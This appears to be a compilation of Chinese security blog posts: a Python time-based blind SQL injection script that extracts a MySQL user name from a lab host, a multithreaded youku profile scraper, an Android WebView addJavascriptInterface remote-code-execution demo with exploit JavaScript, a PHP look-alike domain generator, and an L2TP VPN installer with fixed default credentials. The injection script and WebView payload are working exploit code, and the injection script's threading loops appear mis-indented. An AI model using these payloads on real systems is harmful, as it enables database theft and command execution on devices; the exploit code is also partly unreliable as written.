python blind_injection.py demo for mysql

之前某人分享过判断二进制0/1来盲注,现在用python写了个demo

import urllib
import urllib2
import time
import threading
 
 
class blind_injection:
    """Time-based blind SQL injection demo against the author's lab host.

    Every request asks MySQL to ``sleep(2)`` when one bit of the probed value
    is 1 and to return immediately otherwise; ``_request`` uses a 2 s
    ``urlopen`` timeout, so "timed out" is read as bit 1 and "answered" as
    bit 0.  ``run`` first recovers the 8-bit length of ``user()``, then
    ``_getstep`` recovers the characters one at a time, 8 bits per character,
    one worker thread per bit.

    Defensive reading: the payload closes a single-quoted literal (``1'``) in
    the ``test`` parameter, so the lab page presumably interpolates that
    parameter straight into SQL; parameterized queries remove the flaw.  In a
    web log the probe shows up as bursts of requests carrying ``sleep(`` /
    ``lpad(bin(`` and a sharply bimodal response-time distribution.
    """
    def __init__(self,thread_num):
        # thread_count: workers still running (run()/_getstep() spin on it).
        # thread_num: pool size; the bit loops below assume it is 8.
        self.thread_count=self.thread_num=thread_num
        self.lock=threading.Lock()
        self.res={}        # bit position (as str) -> 0/1 for the length probe
        self.resdata={}    # bit position (as str) -> 0/1 for the current character
        self.tmp=''        # 8-character '0'/'1' string assembled from res/resdata
    def _request(self,URL):
        """GET ``URL`` with a 2 s timeout and return the response body.

        Any exception (timeout, connection refused, HTTP error, ...) yields
        the literal string ``'timeout'``, which callers treat as "bit is 1".
        NOTE(review): a network or HTTP failure is therefore indistinguishable
        from a genuine sleep()-induced timeout.
        """
        user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
        req = urllib2.Request(URL, None, user_agent)
        try:
            request=urllib2.urlopen(req,timeout=2)
        except Exception ,e:
            #time.sleep(0.01)
            return 'timeout'
        return request.read()

    def bin2dec(self,string_num):
        """Parse a string of '0'/'1' characters as a base-2 integer."""
        return int(string_num,2)

    def _getlength(self,ii):
        """Worker: probe bit ``ii+1`` (1-based, MSB first) of the zero-padded
        8-bit binary length of ``user()`` and record it in ``res``."""
        thread_id=int(threading.currentThread().getName())   # read but never used
        ii=ii+1
        url="http://10.211.55.20/testmysql.php?test=1'%20and%20if(mid(lpad(bin(length(user())),8,0),"+str(ii)+",1)=1,sleep(2),0)%23"
        html=self._request(url)
        #print html
        verify = 'timeout'
        # Answered within the timeout -> sleep() did not fire -> bit is 0.
        if verify not in html:
            self.res[str(ii)] = 0
        else:
            self.res[str(ii)] = 1
        # Only the counter is guarded; res is written without the lock.
        self.lock.acquire()
        self.thread_count-=1
        self.lock.release()

    def _getdata(self,j,x):
        """Worker: probe bit ``j`` (1-based, MSB first) of the 8-bit code of
        character ``x`` (1-based) of ``user()`` and record it in ``resdata``."""
        url="http://10.211.55.20/testmysql.php?test=1'%20and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
        html=self._request(url)
        #print url
        #print html
        verify = 'timeout'
        # Answered within the timeout -> sleep() did not fire -> bit is 0.
        if verify not in html:
            self.resdata[str(j)] = 0
        else:
            self.resdata[str(j)] = 1
        # Only the counter is guarded; resdata is written without the lock.
        self.lock.acquire()
        self.thread_count-=1
        self.lock.release()

    def _getstep(self):
        """Recover ``datalength`` characters of ``user()`` into ``data``,
        printing the running result after each character.

        NOTE(review): as pasted, everything from the ``while`` wait down to
        the ``chr`` append is indented inside the inner ``for j`` loop, and
        the worker count is hard-coded to 8 rather than ``thread_num``.
        Confirm against the author's original layout before relying on it.
        """
        self.data=''
        for x in range(self.datalength):
            x=x+1
            self.thread_count=8
            self.tmp=''
            for j in range(self.thread_num):
                j=j+1
                t=threading.Thread(target=self._getdata,name=str(j),args=(j,x))
                t.setDaemon(True)
                t.start()
                while self.thread_count>0:
                    time.sleep(0.01)
                # Bits 1..8 in order give the character's binary code.
                for i in range(8):
                    self.tmp=self.tmp+str(self.resdata[str(i+1)])
                self.data=self.data+chr(self.bin2dec(self.tmp))
            print self.data

    def run(self):
        """Start the length workers, decode the length, then call ``_getstep``.

        NOTE(review): as pasted, the wait loop, the decode and the
        ``_getstep`` call are inside the ``for`` loop that starts the
        workers; confirm against the author's original layout.
        """
        for i in range(self.thread_num):
            t=threading.Thread(target=self._getlength,name=str(i),args=(i,))
            t.setDaemon(True)
            t.start()
            while self.thread_count>0:
                time.sleep(0.01)
            # Bits 1..8 in order give the zero-padded binary length.
            for i in range(8):
                self.tmp = self.tmp + str(self.res[str(i+1)])
            self.datalength=self.bin2dec(self.tmp)
            print 'length:'+ str(self.datalength)
            self._getstep()
 
 
if __name__=='__main__':
    # One worker per bit of the 8-bit values the demo decodes.
    d = blind_injection(8)
    d.run()

python多线程学习笔记1

之前用linux shell写过多线程统计youku网站会员的,现在用python再实现一遍,做为学习笔记备注。

import threading 
import urllib2
import urllib
import base64
import time
 
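class GETyouku:
    """Fetch youku user pages with a pool of worker threads (learning notes).

    Each worker walks numeric ids, base64-encodes the id into the
    ``http://i.youku.com/u/U<base64>`` form and prints the response body.
    ``thread_count`` is the number of workers still running; ``run`` blocks
    until it reaches zero.
    """

    def __init__(self, thread_num):
        """Prepare a pool of ``thread_num`` workers; nothing is started yet."""
        # thread_count is decremented by each worker as it exits.
        self.thread_count = self.thread_num = thread_num
        self.lock = threading.Lock()

    def _getyoukucount(self, ii):
        """Worker body: fetch ids ``2 + ii`` .. ``299`` and print each body.

        The running id is a local rather than ``self.str``: the original kept
        it on the shared instance, so concurrent workers overwrote each
        other's position.  The ``thread_count`` decrement sits in ``finally``
        so that a failed request (``urlopen`` raising) cannot leave ``run``
        spinning forever.
        """
        try:
            current = 2 + ii
            # Same bounds as the original loop: ids 2 .. 299 inclusive.
            while 1 < current < 300:
                encoded = base64.b64encode(str(current))
                url = "http://i.youku.com/u/U" + encoded
                req = urllib2.Request(url)
                body = urllib2.urlopen(req).read()
                print('self.str:' + str(current) + body)
                current += 1
        finally:
            with self.lock:
                self.thread_count -= 1

    def run(self):
        """Start ``thread_num`` daemon workers, then wait for all to finish.

        NOTE(review): the pasted original had lost the ``for`` body's
        indentation; this reading starts every worker first and only then
        waits on ``thread_count``.
        """
        for i in range(self.thread_num):
            worker = threading.Thread(target=self._getyoukucount, name=str(i), args=(i,))
            worker.setDaemon(True)
            worker.start()

        while self.thread_count > 0:
            time.sleep(0.01)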
 
if __name__ == '__main__':
    # Twenty concurrent workers, as in the article.
    d = GETyouku(20)
    d.run()

app安全测试之WebView rce学习笔记

0x00 漏洞原理

由于WebView组件有一个方法(addJavascriptInterface),该方法可以让javascript与android应用交互,接着攻击者可以找到存在“getClass”方法的对象,然后通过反射的机制,得到Java Runtime对象,然后调用静态方法来执行系统命令。

0x01 漏洞demo演示

为了进一步搞清楚这个漏洞,我写了个包含有该漏洞的android应用程序,下面为核心代码

#记得给权限android.permission.INTERNET
 
// Page the vulnerable demo loads; the JavaScript it serves (shown further down)
// reaches the injected object and, via getClass() and reflection, java.lang.Runtime.
private static final String url="http://www.leesec.info/mobilelab/webview_rce.html";
@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    // Title-less layout that holds the WebView (R.id.wv_oauth).
    requestWindowFeature(Window.FEATURE_NO_TITLE);
    setContentView(R.layout.activity_first);
    final WebView webView = (WebView) findViewById(R.id.wv_oauth);
    // JavaScript must be enabled for the bridge below to be reachable at all.
    webView.getSettings().setJavaScriptEnabled(true);
    // DELIBERATELY VULNERABLE: exposes this whole Activity to page JavaScript as
    // "injectedObj".  Without @JavascriptInterface filtering (targetSdkVersion
    // < 17) every public method, including getClass(), is callable from the
    // page, which is what the demo's reflection chain relies on.  Mitigations:
    // expose a minimal object whose bridge methods carry @JavascriptInterface,
    // target API >= 17, and remove the default "searchBoxJavaBridge_" interface.
    webView.addJavascriptInterface(this, "injectedObj");
    webView.loadUrl(url);
}

接着webview_rce.html的部分内容为

// Page side of the demo: "injectedObj" is the Activity the app exposed through
// addJavascriptInterface.  Because every public method of that object is
// reachable from the page, getClass() is available, and from there reflection
// obtains java.lang.Runtime and runs cmdArgs inside the app's own process.
// The fix lives on the app side (see the mitigation notes in the article).
function execute(cmdArgs)
{
   return injectedObj.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs); 
}        
// Demo payload: drop a marker file through the shell.  The article notes that
// /cache had to be made world-writable (777) before the write succeeded.
execute(['/system/bin/sh','-c','echo  "this is a test" > /cache/check.txt']);

如果程序运行成功,但是cache目录下没有生成check.txt文件,我找到原因是cache目录权限太小,给777后,发现运行app后,文件成功写入到android系统内。

0x03 漏洞修复方法

检查WebView类中的addJavascriptInterface方法,是否存在searchBoxJavaBridge_接口
调用 removeJavascriptInterface("searchBoxJavaBridge_") 移除默认接口

工具:php实现穷举域名功能

1.需求如下:
假设某网站域名为http://www.wangzhan.com,要实现这个功能:
域名第一个字符遍历
http://www.aangzhan.com
……
zangzhan.com
域名第二个字符遍历
http://www.wangzhan.com
……
wzngzhan.com
以此类推到域名最后一个字符遍历
2.实现代码如下:

<?php 
 
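// The generator below reads $website_arr[0], [1] and [2], i.e. it expects a
// host of the form www.<name>.<tld>; fail early with a usage line instead of
// indexing past the array when the argument is missing or too short.
if ($argc < 2 || count(explode(".", $argv[1])) < 3) {
	fwrite(STDERR, "usage: php " . $argv[0] . " www.example.com\r\n");
	exit(1);
}
$str=$argv[1];
$website_arr=explode(".",$str);
$website_name=$website_arr[1];          // the part whose characters are varied
$website_length=strlen($website_name);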
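// Look-alike substitution table: each pair is (regex, replacement).  The
// patterns are unanchored, so a substitution applies to every occurrence in
// the host.  The two "www." entries escape the dot (the original "/www./"
// matched "www" followed by ANY character, e.g. "wwwx...").
$key = array(
	array("/j/","l"),
	array("/l/","j"),
	array("/i/","j"),
	array("/j/","i"),
	array("/i/","1"),
	array("/1/","i"),
	array("/j/","1"),
	array("/1/","j"),
	array("/l/","i"),
	array("/i/","l"),
	array("/b/","lo"),
	array("/lo/","b"),
	array("/q/","9"),
	array("/9/","q"),
	array("/u/","v"),
	array("/v/","u"),
	array("/6/","b"),
	array("/b/","6"),
	array("/w/","vv"),
	array("/vv/","w"),
	array("/m/","nn"),
	array("/nn/","m"),
	array("/o/","0"),
	array("/0/","o"),
	array("/m/","n"),
	array("/n/","m"),
	array("/com/","com.cn"),
	array("/com/","cn"),
	array("/com/","net"),
	array("/com/","org"),
	array("/com/","tk"),
	array("/com/","pk"),
	array("/com/","cf"),
	array("/com/","cc"),
	array("/com/","tv"),
	array("/com/","pl"),
	array("/com/","im"),
	array("/cn/","com"),
	array("/cn/","com.cn"),
	array("/cn/","net"),
	array("/cn/","org"),
	array("/cn/","tk"),
	array("/cn/","pk"),
	array("/cn/","cf"),
	array("/cn/","cc"),
	array("/cn/","tv"),
	array("/cn/","pl"),
	array("/cn/","im"),
	array("/cn/","cn.com"),
	array("/cn/","cn.org"),
	array("/cn/","org.cn"),
	array("/cn/","net.cn"),
	array("/cn/","cn.net"),
	array("/www\./","www-"),
	array("/www\./","www"),
	array("/china/","chnina"),
	array("/abc/","abcd"),
	array("/bank/","bork"),
	array("/bank/","benk"),
	array("/bank/","bonk"),
	array("/bank/","bark"),
	array("/so/","sou"),
	array("/2/","z"),
	array("/z/","2"),
	array("/c/","2"),
	array("/c/","z"),
);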
// For every position $j of the name, hand dealstring() the characters to its
// left and to its right so it can try each letter a-z at that position.
for ($j = 0; $j < $website_length; $j++) {
	$left = substr($website_name, 0, $j);
	$right = ($j == $website_length - 1) ? '' : substr($website_name, $j + 1);
	dealstring($left, $right, $website_arr, $key);
}
 
function dealstring($str_zuo,$str_you,$website_arr,$key){
	// Rebuild the host with each letter a-z placed between the two halves of
	// the name and print every look-alike findHost() derives from it.
	foreach (range('a', 'z') as $letter) {
		$candidate = $website_arr[0] . '.' . $str_zuo . $letter . $str_you . '.' . $website_arr[2];
		echo findHost($candidate, $key);
	}
}
 
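function findHost($host,$key){
	// Print one line per variant of $host produced by the substitution table.
	// preg_replace() returns null when a pattern is invalid; the original's
	// loose "!= $host" test then printed an empty line, so null is skipped.
	foreach ($key as $pair) {
		$hostChange = preg_replace($pair[0], $pair[1], $host);
		if ($hostChange !== null && $hostChange !== $host) {
			echo $hostChange . "\r\n";
		}
	}
}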
?>

下图为运行结果:

接着可以实现访问每个网站检查其是否可以访问,然后监控其内容是否为钓鱼网站。

一键安装L2TP VPN脚本

1.安装L2TP VPN方法
第一种: openswan+xl2tpd 安装后,我发现这个只能用WINDOW连接,IOS系统连接不了VPN,所以被迫使用第二种方法。
第二种: strongswan+xl2tpd 安装后,IOS、WINDOW系统都可以连接成功。
2.strongswan+xl2tpd 一键安装脚本(Centos6.5亲测成功)

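# strongswan + xl2tpd one-shot installer for CentOS 6.5 (the article's procedure).
# The PSK and the PPP account default to the values documented in the article;
# override them in the environment instead of editing the script, e.g.
#   PSK='<your psk>' VPN_USER=alice VPN_PASS='<password>' sh install-l2tp.sh
PSK="${PSK:-fuck_great_firewall}"
VPN_USER="${VPN_USER:-test}"
VPN_PASS="${VPN_PASS:-test123}"

rpm -ivh http://download.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
yum -y  update
yum -y install strongswan
yum -y install xl2tpd
# Client traffic is routed through this host, so IP forwarding must be on.
sed -i 's/net.ipv4.ip_forward = 0/net.ipv4.ip_forward = 1/g' /etc/sysctl.conf
sysctl -p
# Open only what IKE/IPsec needs; UDP 1701 is accepted solely when it arrives
# inside IPsec, so bare (unencrypted) L2TP is refused.
iptables -A INPUT -p udp --dport 500 -j ACCEPT # IKE
iptables -A INPUT -p udp --dport 4500 -j ACCEPT # NAT-T
iptables -A INPUT -p udp -m policy --dir in --pol ipsec -m udp --dport 1701 -j ACCEPT # force l2tp through ipsec
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE
# NOTE: these iptables rules live in memory only; they are lost on reboot
# unless saved (e.g. with the iptables service's save action).
ip_addr=` ifconfig  | grep 'inet addr:'| grep -v '127.0.0.1' |cut -d: -f2 | awk '{ print $1}'`
# Appended verbatim to ipsec.conf; $ip_addr is expanded, everything else is literal.
cat >>/etc/strongswan/ipsec.conf <<EOF
conn %default
        ikelifetime=60m
        keylife=20m
        rekeymargin=3m
        keyingtries=1
 
conn l2tp
        keyexchange=ikev1 # IKE版本
        left=$ip_addr
        leftsubnet=0.0.0.0/0
        leftprotoport=17/1701 # l2tp udp流量
        authby=secret # PSK驗證
        leftfirewall=no # 不要讓strongswan更改防火牆
        right=%any # 任意IP
        rightprotoport=17/%any # 任意port udp流量
        type=transport # ipsec transport mode 
        auto=add
EOF
echo ": PSK \"$PSK\"">>/etc/strongswan/ipsec.secrets
# Both secrets files hold credentials in clear text; keep them root-only.
chmod 600 /etc/strongswan/ipsec.secrets
# The original line lacked -i, so listen-addr was printed to stdout and never
# written into xl2tpd.conf.
sed -i 's/\[global\].*$/&\nlisten-addr ='"$ip_addr"'/g' /etc/xl2tpd/xl2tpd.conf
sed -i 's/^mtu.*/mtu 1200/g' /etc/ppp/options.xl2tpd
sed -i 's/^mru.*/mru 1200/g' /etc/ppp/options.xl2tpd
echo 'login'>>/etc/ppp/options.xl2tpd
echo "$VPN_USER * $VPN_PASS *">>/etc/ppp/chap-secrets
chmod 600 /etc/ppp/chap-secrets
service strongswan start
service xl2tpd start
chkconfig strongswan on
chkconfig xl2tpd on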

3.安装完成后,具体信息如下:
连接方式:L2TP
VPN用户名:test
VPN密码:test123
密钥:fuck_great_firewall

4.本文仅供学习交流